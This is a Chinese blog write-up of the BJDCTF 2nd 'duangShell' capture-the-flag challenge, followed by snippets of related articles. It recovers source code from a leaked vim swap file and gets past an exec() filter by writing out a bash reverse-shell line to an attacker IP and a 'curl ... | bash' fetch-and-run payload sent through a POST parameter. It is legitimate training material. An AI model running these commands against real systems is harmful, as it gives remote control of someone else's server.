[BJDCTF 2nd]duangShell(swp源码泄露,反弹shell)

最新推荐文章于 2023-11-25 09:30:00 发布
最新推荐文章于 2023-11-25 09:30:00 发布
阅读量788 收藏 1
点赞数
分类专栏: # 各平台题目 文章标签: 信息安全 CTF BUUCTF
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/106178696
版权

做这道题之前还一直不知道反弹shell是怎么操作的,做完之后恍然大悟,刷题真香
在这里插入图片描述
首先题目中提示了.swp,应该是.swp源码泄露,然后试了试/index.php.swp毫无反应,看了wp之后才知道是/.index.php.swp。。。幸好不是比赛,不然简直被自己蠢死

然后下载下来,拖到kali里用命令vim -r index.php.swp恢复文件,源码:

在这里插入图片描述
看了看过滤,只过滤了cat,天真的我以为用tac就行了。。。结果事情远远没有这么简单,exec()函数是没有回显的,我还一直以为exec()system()是一样的。

在这里插入图片描述

然后看其他师傅说要用反弹shell,这里我用的是MobaXterm,找同学接了个号开个靶机链接到内网。也可以用xshell,连接流程差不多。
在这里插入图片描述

回车创建连接,使用账号root密码123456登录在这里插入图片描述

连接好之后先使用命令ifconfig看下靶机的ip在这里插入图片描述

然后在靶机的/var/www/html目录新建一个能反弹shell的命令文件1.txt,

cd /var/www/html

echo "bash -i >& /dev/tcp/174.1.90.119/2333 0>&1" > 1.txt

在这里插入图片描述

用nc命令监听我们设置的2333端口

nc -lvp 2333

在这里插入图片描述
最后让题目机执行靶机里1.txt的命令,我们传payload:

girl_friend=curl 174.1.90.119/1.txt|bash

可以看到连接上了,并且可以执行命令:在这里插入图片描述
然后拿flag就行了

find / -name "*flag"
cat /etc/demo/P3rh4ps/love/you/flag

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]duangShell反弹shellswp泄露
xlcvv的博客
04-28 1584
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
[BJDCTF 2nd]duangShell
Yang_99的博客
08-16 254
1.swp源码泄露 题目给了提示.swp源码泄露。 访问http://xxx/.index.php.swp下载该文件 该文件产生的原因是:​使用vi编辑器打开文件时,会生成一个.文件名.swp的备份文件,防止意外退出等情况导致文件内容丢失。产生原因主要是管理员在web目录下修改代码文件,导致生成了.swp备份文件。 我们使用vim -r 文件名 来恢复内容,然后按下任意键就可以看到其中的代码了。 <?php error_reporting(0); echo "how can i give you s
[BJDCTF2nd_duangshell]
m0_53314778的博客
03-04 183
知识点: nc命令反弹shell 进入题目: 首先题目中提示了.swp,应该是.swp源码泄露,然后试了试/index.php.swp毫无反应,看了wp之后才知道是/.index.php.swp。。。 访问http://xxx/.index.php.swp下载该文件 该文件产生的原因是:​使用vi编辑器打开文件时,会生成一个.文件名.swp的备份文件,防止意外退出等情况导致文件内容丢失。产生原因主要是管理员在web目录下修改代码文件,导致生成了.swp备份文件。 然后下载下来,拖到kali里用命令v
欧母龙PLC例程源码CQMaster.swp
最新发布
04-21
根据提供的文件信息,本文将对“欧母龙PLC例程源码CQMaster.swp”的相关知识点进行详细解析。 ### 一、欧母龙PLC简介 欧母龙(Omron)是一家全球知名的自动化控制产品生产商,在工业自动化领域拥有广泛的影响力。...
Swp.rar_swp
09-19
标题中的"Swp.rar_swp"暗示我们关注的焦点是一个名为"Swp"的VHDL程序,它被压缩在RAR文件中。VHDL(VHSIC Hardware Description Language)是一种广泛用于电子设计自动化领域的硬件描述语言,它允许工程师用高级语言...
swp_emulate.rar_swp
09-23
在IT行业中,SWP指令是ARM处理器架构中的一个关键原语,用于原子操作。这个"swp_emulate.rar_swp"文件集似乎关注的是通过ldrex/strex指令序列来模拟SWP指令的功能。这里我们将深入探讨SWP指令、ldrex/strex指令以及...
swp.c.zip_swp
09-19
标题 "swp.c.zip_swp" 提供的信息表明这是一个与 C 语言实现滑动窗口算法相关的压缩文件。滑动窗口算法是一种在数据处理和计算机科学中广泛应用的技术,特别是在网络协议、数据流分析、字符串匹配等领域。它涉及到在...
swp.zip_swp_停等
09-14
在这个“swp.zip_swp_停等”压缩包中,我们可以推测它包含了一个MFC(Microsoft Foundation Classes)和CSocket类库实现的停等协议模拟项目。MFC是微软提供的一个C++类库,用于简化Windows应用程序的开发,而CSocket...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
源码泄露
kid的博客
05-24 3911
源码泄露 原理 .git 很好理解吧,git仓库都会有个隐藏文件夹 .git文件夹是git init后在当前目录生成的一个管理git仓库的文件夹,这里包含所有git操作所需要的东西 .DS_Store在mac下听常见的, DS_Store 是用来存储这个文件夹的显示属性的:比如文件图标的摆放位置。删除以后的副作用就是这些信息的失去。 .swp这是在vim编辑时产生的临时文件(自己可以试下)...
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 495
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
BUUCTF [BJDCTF2nd_duangshell]
veinard_F的博客
08-05 450
打开题目后是 提示是swp文件泄露 payload .index.php.swp下载文件 拖到Linux上 用命令vi -r 加路径加文件 恢复文件 得到 (将文件拖到Linux上涉及到主机和虚拟机文件共享的问题,需要在虚拟机设置上安装Vmware tools。) 观察上述代码可以发现 ...
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1610
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
2020-09-12duangshell
zxnimud5的专栏
09-12 302
</head> <body> <center><h1>珍爱网</h1></center> </body> </html> <?php error_reporting(0); echo"how can i give you source code? .swp?!"."<br>"; if(!isset($_POST['girl_friend'])) { die(...
【漏洞挖掘】——61、SWP文件泄露漏洞检测利用
Fly_鹏程万里
10-20 512
SWP文件泄露漏洞是指在使用Vim编辑器编辑一个文件时,Vim会在同一目录下创建一个以".swp"结尾的临时文件来保存编辑过程中的变化,如果在编辑过程中Vim进程被意外终止或者用户没有正确地退出Vim,那么这个临时文件可能会被留下来,如果攻击者能够访问这个临时文件就可以获得原始文件的敏感信息,从而导致信息泄露,需要注意的是不同的操作失败次数将会导致产生不同后缀的交互文件,例如:index.php第一次产生的交换文件名为.index.php.swp,再次意外退出后将会产生名为.index.php.swo的交换
CTFSHOW系列-web9(信息收集-swp泄露)
siu~
11-25 474
CTFSHOW系列解题思路
网站安全漏洞 源码泄漏
01-19
源码泄漏是指网站或应用程序的源代码被意外或恶意地公开或泄露出去。这种漏洞可能会导致严重的安全问题,因为攻击者可以通过分析源代码来发现潜在的漏洞和弱点,从而进行进一步的攻击。 常见的源码泄漏漏洞包括: 1. .swp文件泄漏:攻击者可以直接访问.swp文件,下载回来后删除末尾的.swp扩展名,从而获得源码文件。 2. .git文件夹泄漏:攻击者可以通过泄露的.git文件夹下的文件,还原重建工程源代码。这样,渗透测试人员或攻击者可以进一步审计代码,挖掘文件上传、SQL注入等安全漏洞。 为了防止源码泄漏漏洞,可以采取以下措施: 1. 定期检查和更新服务器和应用程序的安全设置,确保没有敏感信息或源代码被公开。 2. 确保服务器和应用程序的访问权限受到限制,只有授权的人员才能访问和修改源代码。 3. 使用安全的开发实践,如代码审查、输入验证和输出编码,以减少潜在的漏洞。 4. 定期备份源代码,并将备份存储在安全的位置,以防止源码丢失或泄漏。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值